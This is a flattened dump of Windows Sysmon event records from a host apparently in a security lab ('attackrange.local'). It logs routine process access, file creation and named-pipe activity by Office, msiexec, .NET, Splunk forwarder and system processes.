14:58:06.404{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.373{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-walMD5=7F1E67A09A7881556D5D96B3EB6610A1,SHA256=81A2BB4BBD4CC345695C85B31D41523D8E2DC27DE8E0FC719C32E2143CCB3DE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.373{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-shmMD5=B5BC76E30150305AFA98F217B89D883C,SHA256=1EFA7127A0C35B6E09B568C22BC30879290031454313BA3D9F7B35875405BB3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.326{A7A01FEF-B626-607E-1400-00000000BB01}12763692C:\Windows\system32\svchost.exe{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.310{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.310{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.310{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.310{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.310{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.310{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.310{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.279{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=54F7621221E041AFE9BEB17A37AF07C7,SHA256=B58936C12EFCD614CF1020A5DECDEE810C937FCD28CD89D144959D2765B05DB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.279{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D83C7B450E6D334F8236868C2E98EB55,SHA256=677609C903E0730444301F80A3B9EEA503473631CB468AF1506D9805448A19B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000078074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.201{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\inprogressinstallinfo.ipiMD5=DAB677EE4CAFBD8E6DD77DEC3323D1C3,SHA256=3CF06BD6462BA76FF9C9A4586300DA6E72362B89F9187D3B57349E23692CCEFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.201{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF9E9A714F5FAEA781.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000078063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.201{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFCE1EDD4316FBE7C6.TMPMD5=DAB677EE4CAFBD8E6DD77DEC3323D1C3,SHA256=3CF06BD6462BA76FF9C9A4586300DA6E72362B89F9187D3B57349E23692CCEFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.185{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF41362FCB77261EF5.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000078061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.185{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFEEC257C79412245E.TMPMD5=DAB677EE4CAFBD8E6DD77DEC3323D1C3,SHA256=3CF06BD6462BA76FF9C9A4586300DA6E72362B89F9187D3B57349E23692CCEFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.185{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF3B19BC2FD01DCBFF.TMPMD5=300E3CC5AA574229E7281EDC6568F0BB,SHA256=29783FA1E77F6B3F25C597133BEA70524735F5E5AC75CB97544DA15CA7041ACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.185{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d08299.rbsMD5=DECB7B69D0B0DCB161AF525235C79746,SHA256=C5167242AF6260EB937747896487A8A648805B87CE6EBB9A09DC0E7B9EBA8E19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.170{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI72F4.tmpMD5=FCCDC45CA17E5180B40EFC28052BAC39,SHA256=4AB37B0F9C5FE3505E1ECFE0764AAA04838CF81F9E0A402425E057F7A251E621,IMPHASH=620AD7AB8901854C91622E052544AEE7truetrue 23542300x800000000000000078057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.170{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI72E4.tmpMD5=FCCDC45CA17E5180B40EFC28052BAC39,SHA256=4AB37B0F9C5FE3505E1ECFE0764AAA04838CF81F9E0A402425E057F7A251E621,IMPHASH=620AD7AB8901854C91622E052544AEE7truetrue 23542300x800000000000000078056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.154{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFD895399F6AC42A0B.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000078055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.154{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFA6AB0509B1448292.TMPMD5=C57A5F42EC0DD0F75D2080D4387EB8BA,SHA256=3DB340FD6A5320E41C2B4F9832F13D8C1ECFFDEC82F863A2CDF31D3FE6275768,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.154{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF79C602B562B61258.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000078053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.154{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFD83F1E0560B9813E.TMPMD5=C57A5F42EC0DD0F75D2080D4387EB8BA,SHA256=3DB340FD6A5320E41C2B4F9832F13D8C1ECFFDEC82F863A2CDF31D3FE6275768,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.139{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI70B0.tmpMD5=B1A323649B5241CA09D902F39E1621C8,SHA256=9DC5A7FA42A18BCDF6BC69FA25C40EECC0A8CA8B81373E4B6592188A8250EA5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.139{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-1E0E-00000000BB01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.139{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFE-607E-1E0E-00000000BB01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.139{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFE-607E-1E0E-00000000BB01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.092{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-1D0E-00000000BB01}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.092{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFE-607E-1D0E-00000000BB01}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 